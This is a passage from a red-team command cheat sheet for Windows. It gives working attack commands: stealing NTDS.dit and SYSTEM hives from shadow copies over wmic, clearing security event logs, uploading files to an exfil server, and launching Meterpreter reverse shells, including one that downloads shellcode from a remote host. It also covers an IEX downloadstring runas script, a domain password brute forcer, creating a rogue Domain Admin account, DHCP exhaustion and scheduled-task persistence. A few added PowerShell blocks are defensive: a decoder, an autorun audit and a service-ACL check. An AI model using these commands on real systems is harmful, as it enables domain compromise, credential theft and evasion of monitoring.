1. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"
   If any copies already exist then exfil, otherwise create using
   following commands. Check output.txt for any errors
2. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"
3. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive 2>&1 > C:\temp\output.txt"
4. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1 > C:\temp\output.txt"
Step by step instructions on room362.com for step below
5. From Linux, download and run ntdsxtract and libesedb to export
   hashes or other domain information
   a. Additional instructions found under the VSSOWN section
   b. ntdsxtract - http://www.ntdsxtract.com
   c. libesedb - http://code.google.com/p/libesedb/
POWERSHELL
get-content file                                Displays file contents
get-help command -examples                      Shows examples of command
get-command *string*                            Searches for cmd string
get-service                                     Displays services (stop-service, start-service)
get-wmiobject -class win32_service              Displays services, but takes alternate credentials
$PSVersionTable                                 Display powershell version
powershell.exe -version 2.0                     Run powershell 2.0 from 3.0
get-service | measure-object                    Returns # of services
get-psdrive                                     Returns list of PSDrives
get-process | select -expandproperty name       Returns only names
get-help * -parameter credential                Cmdlets that take creds
get-wmiobject -list *network*                   Available WMI network cmds
[Net.DNS]::GetHostEntry("ip")                   DNS Lookup
CLEAR SECURITY & APPLICATION EVENT LOG FOR REMOTE SERVER (SVR01)
Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01
EXPORT OS INFO INTO CSV FILE
Get-WmiObject -class win32_operatingsystem | select -property * | export-csv c:\os.txt
LIST RUNNING SERVICES
Get-Service | where-object {$_.status -eq "Running"}
PERSISTENT PSDRIVE TO REMOTE FILE SHARE:
New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i
RETURN FILES WITH WRITE DATE PAST 8/20
Get-ChildItem -Path c:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
FILE DOWNLOAD OVER HTTP
(new-object system.net.webclient).downloadFile("url","dest")
TCP PORT CONNECTION (SCANNER)
$ports=(#,#,#);$ip="x.x.x.x";foreach ($port in $ports) {try{$socket=New-object System.Net.Sockets.TCPClient($ip,$port);}catch{};if ($socket -eq $NULL) {echo $ip":"$port"- Closed";}else{echo $ip":"$port"- Open";$socket=$NULL;}}
PING WITH 500 MILLISECOND TIMEOUT
$ping = New-Object System.Net.NetworkInformation.ping
$ping.Send("ip",500)
BASIC AUTHENTICATION POPUP
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential("title","message","user","domain")
RUN EXE EVERY 4 HOURS BETWEEN AUG 8-11, 2013 AND THE HOURS OF 0800-1700 (FROM CMD.EXE)
powershell.exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-6])[0-5][0-9]') {Start-Process -WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400}}while(1)"
POWERSHELL RUNAS
$pw = convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process file.exe -verb runas}'
EMAIL SENDER
powershell.exe Send-MailMessage -to "email" -from "email" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer Target_Email_Server_IP
TURN ON POWERSHELL REMOTING (WITH VALID CREDENTIALS)
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item wsman:\localhost\client\trustedhosts *'"
at \\ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username
LIST HOSTNAME AND IP FOR ALL DOMAIN COMPUTERS
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='DOMAIN'" | select textrepresentation
POWERSHELL DOWNLOAD OF A FILE FROM A SPECIFIED LOCATION
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source="""https://YOUR_SPECIFIED_IP/file.zip"""; $destination="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.DownloadFile($source, $destination);"
POWERSHELL DATA EXFIL
Script will send a file ($filepath) via http to server ($server) via POST
request. Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://YOUR_SPECIFIED_IP/folder"""; $filepath="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"
USING POWERSHELL TO LAUNCH METERPRETER FROM MEMORY
~ Need Metasploit v4.5+ (msfvenom supports Powershell)
~ Use Powershell (x86) with 32 bit Meterpreter payloads
~ encodeMeterpreter.psl script can be found on next page
ON ATTACK BOXES
1. ./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86
LHOST=l.l.l.l LPORT=443 audit.psl
2. Move audit.psl into same folder as encodeMeterpreter.psl
3. Launch Powershell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl
5. Copy the encoded Meterpreter string
START LISTENER ON ATTACK BOX
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse https
4. set LHOST 1. 1. 1. 1
5. set LPORT 443
6. exploit -j
ON TARGET (MUST USE POWERSHELL (x86))
1. powershell. exe -noexi t -encodedCommand paste encoded t~eterpreter
string here
PROFIT
ENCODEMETERPRETER. PSl [7]
# Get Contents of Script
$contents = Get-Content audit.ps1
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$contents | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 Encode Stream
$code = [Convert]::ToBase64String($ms.ToArray())
# Build the one-liner that inflates and runs the script; the backtick keeps each $ literal
$command = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream (,`$([Convert]::FromBase64String('$code')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
# Invoke-Expression $command
# -encodedCommand expects Base64 over UTF-16LE text
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer
USING POWERSHELL TO LAUNCH METERPRETER (2ND METHOD)
ON BT ATTACK BOX
1. msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=8080 R | msfencode -t psh -a x86
ON WINDOWS ATTACK BOX
1. c:\> powershell
2. PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
4. PS c:\> $e = [Convert]::ToBase64String($u)
5. PS c:\> $e
6. Copy contents of $e
START LISTENER ON ATTACK BOX
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j
ON TARGET SHELL (1: DOWNLOAD SHELLCODE, 2: EXECUTE)
1. c:\> powershell -noprofile -noninteractive -command "& {$client=new-object System.Net.WebClient;$client.DownloadFile('http://1.1.1.1/shell.txt','c:\windows\temp\shell.txt')}"
2. c:\> powershell -noprofile -noninteractive -noexit -command "& {$cmd=type 'c:\windows\temp\shell.txt';powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}"
PROFIT
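Added example, not from the book or from TrustedSec: both recipes above end with PowerShell receiving a -encodedCommand value (Base64 over UTF-16LE text; the first method additionally wraps a Deflate-compressed, Base64-encoded script inside an Invoke-Expression call). This script unwraps both layers without executing anything, which is how such a command line, seen in a process-creation log, can be read during triage. The sample input is constructed inside the script; PowerShell 3+ with .NET is assumed.

```powershell
# Added example, not from the book: unwrap a -encodedCommand value without running it.
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory=$true)][string]$EncodedCommand)
    # Layer 1: -encodedCommand is always Base64 over UTF-16LE text (both recipes produce this)
    $outer = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($EncodedCommand))
    $inner = $null
    # Layer 2 (encodeMeterpreter.ps1 style): a Deflate-compressed, Base64-encoded script
    # handed to Invoke-Expression. Pull the literal out of the wrapper and inflate it ourselves.
    if ($outer -match "FromBase64String\('([A-Za-z0-9+/=]+)'\)") {
        $ms = New-Object IO.MemoryStream (,[Convert]::FromBase64String($Matches[1]))
        $ds = New-Object IO.Compression.DeflateStream ($ms, [IO.Compression.CompressionMode]::Decompress)
        $sr = New-Object IO.StreamReader ($ds, [Text.Encoding]::ASCII)
        $inner = $sr.ReadToEnd()
        $sr.Close()
    }
    [pscustomobject]@{ Outer = $outer; Inner = $inner }
}

# Constructed sample: a harmless one-liner wrapped the way encodeMeterpreter.ps1 wraps audit.ps1
$sample = 'Write-Host "constructed sample script"'
$ms = New-Object IO.MemoryStream
$cs = New-Object IO.Compression.DeflateStream ($ms, [IO.Compression.CompressionMode]::Compress)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$sw.WriteLine($sample)
$sw.Close()
$code = [Convert]::ToBase64String($ms.ToArray())
$wrapper = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream (,`$([Convert]::FromBase64String('$code')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($wrapper))

# Decode both layers; nothing recovered here is executed
$result = ConvertFrom-EncodedCommand -EncodedCommand $encoded
"Outer layer (the Invoke-Expression wrapper): $($result.Outer)"
"Inner script (recovered from the Deflate layer): $($result.Inner)"
```

For a command produced only by the second method, Inner stays null and Outer already holds the plaintext script.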
WINDOWS REGISTRY
OS INFORMATION
HKLM\Software\Microsoft\Windows NT\CurrentVersion
PRODUCT NAME
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductName
DATE OF INSTALL
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate
REGISTERED OWNER
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner
SYSTEM ROOT
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot
TIME ZONE (OFFSET IN MINUTES FROM UTC)
HKLM\System\CurrentControlSet\Control\TimeZoneInformation /v ActiveTimeBias
MAPPED NETWORK DRIVES
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
MOUNTED DEVICES
HKLM\System\MountedDevices
USB DEVICES
HKLM\System\CurrentControlSet\Enum\USBStor
TURN ON IP FORWARDING
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters - IPEnableRouter = 1
PASSWORD KEYS: LSA SECRETS CAN CONTAIN VPN, AUTOLOGON, OTHER PASSWORDS
HKEY_LOCAL_MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon
AUDIT POLICY
HKLM\Security\Policy\PolAdTev
KERNEL/USER SERVICES
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services
INSTALLED SOFTWARE ON MACHINE
HKLM\Software
INSTALLED SOFTWARE FOR USER
HKCU\Software
RECENT DOCUMENTS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
RECENT USER LOCATIONS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU & \OpenSaveMRU
TYPED URLS
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
MRU LISTS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
LAST REGISTRY KEY ACCESSED
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKey
STARTUP LOCATIONS
HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run
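Added example, not from the book: an autorun review that walks exactly the STARTUP LOCATIONS listed above, prints every configured command, and flags the ones that launch a script interpreter or a download-and-run idiom, so an unexpected persistence entry stands out. The Suspect heuristic and the PowerShell 3+ requirement are my assumptions.

```powershell
# Added example, not from the book: enumerate the registry startup locations listed on the page.
function Get-StartupEntry {
    # Paths copied from the STARTUP LOCATIONS list; the last key holds the Load and Run values
    $keys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows'
    )
    # Properties Get-ItemProperty adds that are not registry values
    $meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $keys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = (Get-ItemProperty -Path $key).PSObject.Properties
        foreach ($prop in $props) {
            if ($meta -contains $prop.Name) { continue }
            # Under ...\Windows NT\CurrentVersion\Windows only the Load and Run values are autoruns
            if ($key -like '*\Windows NT\CurrentVersion\Windows' -and
                @('Load', 'Run') -notcontains $prop.Name) { continue }
            $cmd = [string]$prop.Value
            [pscustomobject]@{
                Key     = $key
                Name    = $prop.Name
                Command = $cmd
                # Heuristic (assumption): interpreters and the download-and-run idioms seen on this page
                Suspect = [bool]($cmd -match 'powershell|wscript|cscript|mshta|rundll32|-enc|DownloadString|DownloadFile')
            }
        }
    }
}

# Suspect entries first, so the review starts with what most needs explaining
Get-StartupEntry | Sort-Object Suspect -Descending | Format-Table -AutoSize
```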
ENUMERATING WINDOWS DOMAIN WITH DSQUERY
LIST USERS ON DOMAIN WITH NO LIMIT ON RESULTS
dsquery user -limit 0
LIST GROUPS FOR DOMAIN=VICTIM.COM
dsquery group "cn=users, dc=victim, dc=com"
LIST DOMAIN ADMIN ACCOUNTS
dsquery group -name "domain admins" | dsget group -members -expand
LIST ALL GROUPS FOR A USER
dsquery user -name bob | dsget user -memberof -expand
GET A USER'S LOGIN ID
dsquery user -name bob | dsget user -samid
LIST ACCOUNTS INACTIVE FOR 2 WEEKS
dsquery user -inactive 2
ADD DOMAIN USER
dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpass -display "Bob" -pwdneverexpires yes -memberof "CN=Domain Admins,CN=Users,DC=victim,DC=com"
DELETE USER
dsrm -subtree -noprompt "CN=Bob,CN=Users,DC=victim,DC=com"
LIST ALL OPERATING SYSTEMS ON DOMAIN
dsquery * "DC=victim,DC=com" -scope subtree -attr "cn" "operatingSystem" "operatingSystemServicePack" -filter "(&(objectclass=computer)(objectcategory=computer)(operatingSystem=Windows*))"
LIST ALL SITE NAMES
dsquery site -o rdn -limit 0
LIST ALL SUBNETS WITHIN A SITE
dsquery subnet -site sitename -o rdn
LIST ALL SERVERS WITHIN A SITE
dsquery server -site sitename -o rdn
FIND SERVERS IN THE DOMAIN
dsquery * domainroot -filter "(&(objectCategory=Computer)(objectClass=Computer)(operatingSystem=*Server*))" -limit 0
DOMAIN CONTROLLERS PER SITE
dsquery * "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter (objectCategory=Server)
WINDOWS SCRIPTING
* If scripting in a batch file, variables must be preceded with %%, i.e. %%i
NESTED FOR LOOP PING SWEEP
for /L %i in (10,1,254) do @ (for /L %x in (10,1,254) do @ ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> live.txt)
LOOP THROUGH FILE
for /F %i in (file) do command
DOMAIN BRUTE FORCER
for /F %n in (names.txt) do for /F %p in (pawds.txt) do net use \\DC01\IPC$ /user:domain\%n %p 1>NUL 2>&1 && echo %n:%p && net use /delete \\DC01\IPC$ > NUL
ACCOUNT LOCKOUT (LOCKOUT.BAT)
@echo Test run:
for /f %%U in (list.txt) do @for /l %%C in (1,1,5) do @echo net use \\WIN-1234\c$ /USER:%%U wrongpass
DHCP EXHAUSTION
for /L %i in (2,1,254) do (netsh interface ip set address local static 1.1.1.%i netmask gw ID %1 ping 127.0.0.1 -n 1 -w 10000 > nul %1)
DNS REVERSE LOOKUP
for /L %i in (100,1,105) do @ nslookup 1.1.1.%i | findstr /i /c:"Name" >> dns.txt && echo Server: 1.1.1.%i >> dns.txt
SEARCH FOR FILES BEGINNING WITH THE WORD "PASS" AND THEN PRINT IF IT'S A DIRECTORY, FILE DATE/TIME, RELATIVE PATH, ACTUAL PATH AND SIZE (@VARIABLES ARE OPTIONAL)
forfiles /P c:\temp /s /m pass* -c "cmd /c echo @isdir @fdate @ftime @relpath @path @fsize"
SIMULATE MALICIOUS DOMAIN CALLOUTS (USEFUL FOR AV/IDS TESTING)
Run a packet capture on the attack domain to receive the callouts.
domains.txt should contain known malicious domains.
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n attack_domain > NUL 2>&1 & ping -n 5 127.0.0.1 > NUL 2>&1)
IE WEB LOOPER (TRAFFIC GENERATOR)
for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U & ping -n 6 localhost & taskkill /F /IM iexplore.exe
GET PERMISSIONS ON SERVICE EXECUTABLES
for /f "tokens=2 delims='='" %a in ('wmic service list full ^| find /i "pathname" ^| find /i /v "system32"') do @echo %a >> c:\windows\temp\3afd4ga.tmp
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe /c icacls "%a"
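Added example, not from the book: the wmic + icacls loop above, redone as a hardening audit that reports service binaries outside System32 whose ACL lets Everyone, Users, Authenticated Users or INTERACTIVE modify them, and notes when the service path is unquoted and contains spaces. The .exe-based path extraction, the principal list and PowerShell 3+ are my assumptions.

```powershell
# Added example, not from the book: find service binaries that low-privilege principals can alter.
function Get-WritableServiceBinary {
    # Principals whose write access to a service binary is a finding to fix (assumption)
    $weak = 'Everyone', 'BUILTIN\\Users', 'NT AUTHORITY\\Authenticated Users', 'NT AUTHORITY\\INTERACTIVE'
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $pathName = [string]$svc.PathName
        # Assumption: the binary ends in .exe; take the path up to it, quoted or not, so an
        # unquoted path that contains spaces is still resolved as a whole
        if ($pathName -match '^\s*"?([^"]+?\.exe)') { $exe = $Matches[1] } else { continue }
        # Mirror the page's filter: System32 binaries are skipped
        if ($exe -match '\\system32\\') { continue }
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value
            $isWeak = [bool]($weak | Where-Object { $who -match "^$_`$" })
            # Rights that let the holder replace the file, change its contents, or rewrite its ACL
            $canWrite = $ace.FileSystemRights -match '\b(Write|WriteData|Modify|FullControl|TakeOwnership|ChangePermissions)\b'
            if ($isWeak -and $canWrite) {
                [pscustomobject]@{
                    Service  = $svc.Name
                    Binary   = $exe
                    Identity = $who
                    Rights   = $ace.FileSystemRights
                    # An unquoted path with spaces is a separate finding even when the ACL is tight
                    Unquoted = ($pathName -notmatch '^\s*"') -and ($exe -match ' ')
                }
            }
        }
    }
}

Get-WritableServiceBinary | Format-Table -AutoSize
```

Run it elevated so every service's ACL is readable; the fix for each row is to restore the binary's ACL (icacls, as on the page) and to quote the service path.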
ROLLING REBOOT (REPLACE /R WITH /S FOR A SHUTDOWN):
for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot message"
SHELL ESCALATION USING VBS (NEED ELEVATED CREDENTIALS)
# Create .vbs script with the following
Set shell = wscript.createobject("wscript.shell")
Shell.run "runas /user:<user> " & """" & "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c \" & """" & "IEX ((New-Object Net.WebClient).downloadstring('<url>'))\" & """" & """"
wscript.sleep (100)
shell.Sendkeys "<password>" & "{ENTER}"
TASK SCHEDULER
* Scheduled task binary paths CANNOT contain spaces because everything after the first space in the path is considered to be a command-line argument. Enclose the /TR path parameter between backslash (\) AND quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x arg1"
TASK SCHEDULER (ST=START TIME, SD=START DATE, ED=END DATE)
*MUST BE ADMIN
SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN\user /RP password
TASK SCHEDULER PERSISTENCE [10]
* For 64 bit use: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN Task...